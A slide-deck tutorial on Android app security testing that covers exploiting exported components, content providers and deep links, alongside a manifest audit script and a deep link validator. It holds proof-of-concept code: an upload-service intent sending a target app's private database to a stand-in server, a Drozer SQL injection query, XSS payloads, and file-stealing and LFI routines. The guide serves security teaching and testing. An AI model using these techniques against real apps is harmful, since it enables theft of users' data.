Android Hacking: by Kyle B3nac

Android applications can be vulnerable to exploitation through exported components like activities, services, and broadcast receivers if they do not properly validate user-controlled data passed into them. Deep links that are not properly verified can also be exploited through CSRF and open redirects if they do not check the host, scheme, or parameters of the deep link URL. Developers should ensure exported components and deep links only accept expected and validated inputs to prevent attackers from abusing application functionality or accessing unauthorized data.


Android Hacking

By Kyle B3nac
@b3nac
Overview

Android Workflow
- Android Workflow
- Android Recon
- Api Key Recon
- Reverse engineering apis
- Android application directories

Exported Android Components
- Android Intents
- User Input
- Webviews
- How to exploit components

Deep Link Exploitation
- Host validation, scheme validation
- Exploiting Deeplinks
- Deep link LFIs
- Android public directories
Android Workflow
- Android Studio - PoC development, emulators, check for debugging info
- Jadx - Decompile apks and source code review
- Adb - (Android Debug Bridge)
- Objection - Patching apks without a rooted device
- Drozer - Map out attack surface, useful functions
- DB Browser for SQLite - View what is stored in SQLite databases
- Burp Suite - After patching the apk, installing the cert on the device
- Custom Bash scripts - Automate the redundant tasks
- Cell Phones - Galaxy S10e, test phone J3 Orbit, Android Studio emulator
Android Recon

- AndroidManifest.xml (basically a blueprint for the application)

Find exported components, api keys, custom deep link schemas, schema endpoints etc.

- resources.arsc/strings.xml

Developers are encouraged to store strings in this file instead of hard coding in application.

- res/xml/file_paths.xml

Shows file save paths.

- Search source code recursively

Especially BuildConfig files.


API Key Recon
Always verify if the key is read or read/write with api documentation examples.

- Higher impact
- Higher payout
- Definite triage

Solving the api key puzzle

- String references in Android Classes

getString(R.string.cmVzb3VyY2VzX3lv)
cmVzb3VyY2VzX3lv is the string resource label.

- Find these string references in strings.xml

<string name="cmVzb3VyY2VzX3lv">apikeyhere</string>

- Piece together the domains and required params in source code


Exported Android Components

- Activities - Entry points for application interactions of components specified in AndroidManifest.xml.


Has several states managed by callbacks such as onCreate().

- Service - Supplies additional functionality in the background.

- Broadcast receivers - Receive broadcasts for events of interest. The broadcast intents a receiver
handles are usually specified in its intent filter.

- Content providers - Helps applications manage access to stored data and ways to share data with
other Android applications.
How to Exploit Android Activities

- Access to protected intents via exported Activities

One exported activity that accepts a user provided intent can expose protected intents.

- Access to sensitive data via exported Activity

Often combined with deep links to steal data via unvalidated parameters. Write session tokens to an
external file.

- Access to sensitive files, stealing files, replacing imported files via exported Activities

external-files-path, external-path

Public app directories


Access to Protected Intents via Exported Activities

private void exampleVulnerableMethod(Intent intent) {
    // Intent object supplied by whoever started this exported activity
    Intent deeplinkIntent = (Intent) intent.getParcelableExtra("attacker_provided_data");

    // if deeplink does not equal null startActivity with intent provided by user
    if (!(deeplinkIntent == null || this.consumedDeeplinkIntent)) {
        startActivity(deeplinkIntent); // starting an intent provided by a user
    }
}
Exploitation of Android Services
Custom file upload service example that is vulnerable because android:exported="true". When the service is exported,
third party applications can send data to it or steal sensitive data from the application, depending on the service's function.
Check whether params and intent data can be set from a proof of concept application.

UploadTaskParameters params = new UploadTaskParameters();
params.setId("1");
params.setServerUrl("https://your-server-receives-app-data.com");
try {
    // Private database of the target app, read by the exported service on its behalf
    params.addFile(new UploadFile("/data/data/com.example/database/ohno.db"));
} catch (FileNotFoundException e) {
    throw new IllegalStateException(e); // Here to satisfy try catch requirement
}

Intent intent = new Intent("com.example.action.upload");
intent.setClassName("com.example", "com.example.UploadService");
intent.putExtra("httpTaskParameters", new HttpUploadTaskParameters());
startService(intent);
Exploitation of Android Broadcast Receivers
Vulnerable when receiver is exported and accepts user provided broadcasts.

// Extras read straight from whatever broadcast reaches the exported receiver
String totally = paramIntent.getStringExtra("totally");
String secure = paramIntent.getStringExtra("secure");

ADB PoC

adb shell am broadcast -a com.b3nac.injuredandroid.intent.action.CUSTOM_INTENT --es totally "test" --es secure "test"

Java PoC

private void send() {
    String totally = "test";
    String secure = "test";
    // Create intent, set to matching action, send exploit broadcast
    Intent intent = new Intent(getApplicationContext(), FlagFiveReceiver.class);
    intent.setAction("com.b3nac.injuredandroid.intent.action.CUSTOM_INTENT");
    intent.putExtra("totally", totally);
    intent.putExtra("secure", secure);
    sendBroadcast(intent);
}
Exploitation of Android Content Providers
Content providers that connect to sqlite can be exploited via SQL injection by third party apps.

adb shell content query --uri <URI> [--user <USER_ID>] [--projection <PROJECTION>] [--where <WHERE>] [--sort
<SORT_ORDER>]

With Drozer to make it easier.

dz> run app.provider.query content://app.test/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"

Upload content providers that only verify class names can be exploited with a third party activity that
has the same class name, “com.app.spoofedactivity”. This is possible because
android:grantUriPermissions="true" is set and the check below only compares the class name, not the package.

public static boolean checkOnlyClassName(Intent intent) {
    ComponentName component = intent.getComponent();
    String className = component.getClassName();
    // Only the class name is compared, so any package can supply a class with the accepted name
    if (className.equals(classInAcceptedList)) {
        // Allow access
        return true;
    }
    return false;
}
What is a Deep Link?
“In Android, a deep link is a link that takes you directly to a specific destination within an app.”

- Think of deep links as Android urls to specific parts of the application.


- Usually mirrors the web application, except with a different schema that navigates directly to specific Android activities.

“Secure” implementation of a deeplink schema.

<data android:scheme="flag11" android:host="dashboard" android:path="/user"/>

The deep link would have to match this exactly to be flag11://dashboard/user

Verified deep links can only use http and https schemas. Sometimes developers keep custom schemas for testing new
features.
Exploitation of Deep Links
Type of vulnerabilities are based on how the scheme://, host://, and parameters are validated

<activity android:theme="@style/AppTheme" android:label="@string/title_activity_deep_link"


android:name=".DeepLinkActivity">
<intent-filter>
<action android:name="android.intent.action.VIEW"/>
<category android:name="android.intent.category.DEFAULT"/>
<category android:name="android.intent.category.BROWSABLE"/>
<data android:scheme="flag11"/>
</intent-filter>
</activity>

CSRF - Test when autoVerify="true" is not present in AndroidManifest.xml; it's easier then.

Open redirect - Test when custom schemes do not verify endpoint parameters or hosts

XSS - Test when endpoint parameters or host not validated, addJavaScriptInterface and
setJavascriptEnabled(true); is used.

LFI - Test when deep link parameters aren’t validated. appschema://app/goto?file=


Deep Link CSRF
Deep links take the user directly to a specific part of the Android application.

Developers sometimes use deep links as a shortcut that will modify data or automatically execute an action
such as downloading a file. CSRF takes place with “state changing deep links.”

All deep links are GET requests and should be verified with autoVerify=true. Verified deep links also check
Android application origin based on sha256_cert_fingerprints.

https://domain.name/.well-known/assetlinks.json

<intent-filter android:autoVerify="true">
<action android:name="android.intent.action.VIEW" />
<category android:name="android.intent.category.DEFAULT" />
<category android:name="android.intent.category.BROWSABLE" />
<data android:scheme="https" android:host="www.example.com" />
<data android:scheme="https" android:host="mobile.example.com" />
</intent-filter>
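The manifest checks from Android Recon and the autoVerify rule above can be scripted. The audit below is an added example, not code from the slides: it parses a constructed AndroidManifest.xml (built from the deck's DeepLinkActivity filter) with Python's standard library and flags exported components, BROWSABLE filters on custom schemes, filters that lack autoVerify or a host, and providers that grant URI permissions.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # android: attribute namespace
COMPONENTS = ("activity", "service", "receiver", "provider")

# Constructed manifest: the deck's DeepLinkActivity filter plus a verified https filter.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"><application>
 <activity android:name=".DeepLinkActivity"><intent-filter>
  <action android:name="android.intent.action.VIEW"/>
  <category android:name="android.intent.category.DEFAULT"/>
  <category android:name="android.intent.category.BROWSABLE"/>
  <data android:scheme="flag11"/></intent-filter></activity>
 <activity android:name=".LinkActivity"><intent-filter android:autoVerify="true">
  <action android:name="android.intent.action.VIEW"/>
  <category android:name="android.intent.category.DEFAULT"/>
  <category android:name="android.intent.category.BROWSABLE"/>
  <data android:scheme="https" android:host="www.example.com"/></intent-filter></activity>
 <service android:name=".UploadService" android:exported="true"/>
 <provider android:name=".FileProvider" android:grantUriPermissions="true"/>
</application></manifest>"""

def audit(manifest_xml):
    """Return (component name, finding) pairs a reviewer should look at."""
    findings = []
    for comp in ET.fromstring(manifest_xml).iter():
        if comp.tag not in COMPONENTS:
            continue
        name, filters = comp.get(A + "name"), comp.findall("intent-filter")
        exported = comp.get(A + "exported")
        # No explicit android:exported: a component with an intent-filter is exported
        # (the pre-Android 12 default); providers are simplified to "not exported" here.
        if exported is None:
            exported = "true" if filters else "false"
        if exported == "true":
            findings.append((name, "exported"))
        for f in filters:
            cats = {c.get(A + "name") for c in f.findall("category")}
            if "android.intent.category.BROWSABLE" not in cats:
                continue  # not reachable from a web page or browser link
            data = f.findall("data")
            custom = {d.get(A + "scheme") for d in data} - {"http", "https", None}
            if custom:
                findings.append((name, "custom scheme " + ",".join(sorted(custom))))
            if f.get(A + "autoVerify") != "true":
                findings.append((name, "deep link without autoVerify"))
            if not any(d.get(A + "host") for d in data):
                findings.append((name, "deep link without host restriction"))
        if comp.get(A + "grantUriPermissions") == "true":
            findings.append((name, "grantUriPermissions=true"))
    return findings
```

Run it against the manifest pulled from a decompiled apk (Jadx writes it next to the sources) to get the first list of components worth reviewing.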
Deep Link CSRF Examples
Find a deeplink that automates an action without a user prompt, chances are the user has already granted permissions for all
application actions.

For example a deep link that automatically downloads a sensitive file to a public directory guarantees a malware application
can steal that file.

Java
Request deeplink.

Then steal file with Intent.ACTION_SENDTO and Intent.EXTRA_STREAM from public directory for proof of concept.
Deep Link Open Redirects
Schema in an intent-filter only specified with a scheme in AndroidManifest.xml

<intent-filter>
<action android:name="android.intent.action.VIEW"/>
<category android:name="android.intent.category.DEFAULT"/>
<category android:name="android.intent.category.BROWSABLE"/>
<data android:scheme="flag11"/>
</intent-filter>

- Further investigate Activity class in this case “DeepLinkActivity”.


- Activity validation that only requires a specific protocol.

Custom schema may be converted to match web application protocol

val data = intent.data
val appSchema = "flag11" == data?.scheme

if (appSchema) {
    // Only the scheme is checked; the host is copied unvalidated into an https URL
    val convertScheme = "https://" + data?.host
    startActivity(Intent(Intent.ACTION_VIEW, Uri.parse(convertScheme)))
}
Deep Link Open Redirect Example

Proof of concept with html


<html>
<a href="flag11://google.com">Open Redirect PoC</a>
</html>

Proof of concept with ADB


adb shell am start -W -a android.intent.action.VIEW -d "flag11://google.com"
Deep Link XSS
Possible if schema, host, and url parameters aren’t validated.

- Some cases javascript:alert(“PoC”); will work if any schema is accepted

Look for addJavascriptInterface and setJavaScriptEnabled(true);

Android doesn’t enable javascript by default. When a mobile application needs to interact with a Web
application this is where javascript is sometimes enabled for compatibility with WebViews.

//Defined Webview

WebView flagWebView = new WebView(this);


setContentView(flagWebView);
flagWebView.getSettings().setJavaScriptEnabled(true);
flagWebView.setWebChromeClient(new WebChromeClient());

//User supplied data

flagWebView.loadUrl(getIntent().getStringExtra("totally_secure"));
Deep Link XSS Example
Proof of concept with Java
Uri uri = Uri.parse("appschema://<svg onload=alert(1)>");
Intent startDownloadIntent = new Intent(Intent.ACTION_VIEW, uri);
startActivity(startDownloadIntent);

Proof of concept with html page


<html>
<a href="appschema://<svg onload=alert(1)>">XSS PoC</a>
</html>
Deep Link LFIs
Try on custom schemes and verified scheme parameters.

Verified schemes such as http:// and https:// might lookup server files from the mobile application
depending on implementation.

See where the application is saving account data in res/xml/file_paths.xml

There are two keywords for externally saved files, “external-files-path” and “external-path”. APP_DATA in the
example above is what the file directory name would be in a publicly accessible app directory.
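The open redirect, XSS and LFI cases above all come from a handler that acts on a deep link without checking its scheme, host, path and parameters. The function below is an added example, not code from the slides: it models those checks in Python for the deck's flag11://dashboard filter and its goto?file= parameter, with FILE_ROOT as an assumed private app directory.

```python
from urllib.parse import urlsplit, parse_qs
import posixpath

APP_SCHEME = "flag11"                          # the deck's custom scheme
ALLOWED_HOSTS = {"dashboard"}                  # exact netloc match, so userinfo/port tricks fail
ALLOWED_PATHS = {"/user", "/goto"}
FILE_ROOT = "/data/data/com.example/files/"    # assumed private directory served by ?file=

def validate_deep_link(uri):
    """Return (ok, reason); the handler must drop the link unless ok is True."""
    parts = urlsplit(uri)
    if parts.scheme != APP_SCHEME:             # also drops javascript: and http(s): links
        return False, "unexpected scheme " + repr(parts.scheme)
    if parts.netloc not in ALLOWED_HOSTS:      # flag11://google.com style open redirect
        return False, "unexpected host " + repr(parts.netloc)
    if parts.path not in ALLOWED_PATHS:
        return False, "unexpected path " + repr(parts.path)
    params = parse_qs(parts.query, keep_blank_values=True)
    if "file" in params:
        # Resolve against the private root; absolute paths and ../ escapes end up outside it
        target = posixpath.normpath(posixpath.join(FILE_ROOT, params["file"][0]))
        if not target.startswith(FILE_ROOT):
            return False, "file outside app directory " + repr(target)
    return True, "ok"
```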
Files Stored in Public Directories
“Use the directories within internal storage to save sensitive information that other apps shouldn't access.”

- All applications can access those files on the mobile device

- Deep links can be used to exfiltrate specific files

- Files can be uploaded via streaming intents

private void sendToEmail(String folder_name, String file_name) {
    try {
        Intent intent = new Intent(Intent.ACTION_SENDTO);
        intent.setType("text/plain");
        intent.putExtra(Intent.EXTRA_SUBJECT, "Subject");
        // Attach the file from the public directory as a stream
        intent.putExtra(Intent.EXTRA_STREAM, Uri.parse("file:///" + folder_name + file_name));
        intent.setData(Uri.parse("mailto:[email protected]"));
        intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        startActivity(intent);
    } catch (Exception e) {
        System.out.println("Email did not send because " + e);
    }
}
Public Android Directories

Environment.getExternalStorageDirectory() /storage/sdcard0
Environment.getExternalStoragePublicDirectory(DIRECTORY_ALARMS) /storage/sdcard0/Alarms
Environment.getExternalStoragePublicDirectory(DIRECTORY_DCIM) /storage/sdcard0/DCIM
Environment.getExternalStoragePublicDirectory(DIRECTORY_DOWNLOADS) /storage/sdcard0/Download
Environment.getExternalStoragePublicDirectory(DIRECTORY_MOVIES) /storage/sdcard0/Movies
Environment.getExternalStoragePublicDirectory(DIRECTORY_MUSIC) /storage/sdcard0/Music
Environment.getExternalStoragePublicDirectory(DIRECTORY_NOTIFICATIONS) /storage/sdcard0/Notifications
Environment.getExternalStoragePublicDirectory(DIRECTORY_PICTURES) /storage/sdcard0/Pictures
Environment.getExternalStoragePublicDirectory(DIRECTORY_PODCASTS) /storage/sdcard0/Podcasts
Environment.getExternalStoragePublicDirectory(DIRECTORY_RINGTONES) /storage/sdcard0/Ringtones

Application directories that can be accessed with read/write permissions granted are then basically public:

/sdcard/Android/data/com.example/appdata/example.pdf
Deep Link LFI Example
Proof of concept with Java
private static void searchFolderRecursive(File folder) {
    if (folder != null) {
        if (folder.listFiles() != null) {
            for (File file : folder.listFiles()) {
                if (file.isFile()) {
                    if (file.getName().contains(".pdf")) {
                        Uri uri = Uri.parse("appschema://dashboard/goto?file=/sdcard/Android/data/com.example/appdirectory/" +
                                file.getName());
                        Intent intent = new Intent(Intent.ACTION_VIEW, uri);
                        startActivity(intent);
                        Log.v("Got a file!", "File = " + file.getName());
                    }
                } else {
                    searchFolderRecursive(file);
                }
            }
        }
    }
}

Proof of concept with html


<html>
<a href="appschema://dashboard/goto?file=/sdcard/Android/data/com.example/appdirectory/test.pdf">Test LFI</a>
</html>
Resources
Some examples based on:
https://hackerone.com/reports/200427
https://hackerone.com/reports/258460
https://hackerone.com/reports/272044

Tool resources:
https://github.com/skylot/jadx
https://developer.android.com/studio/command-line/adb
https://github.com/sensepost/objection
https://github.com/FSecureLABS/drozer
https://sqlitebrowser.org/
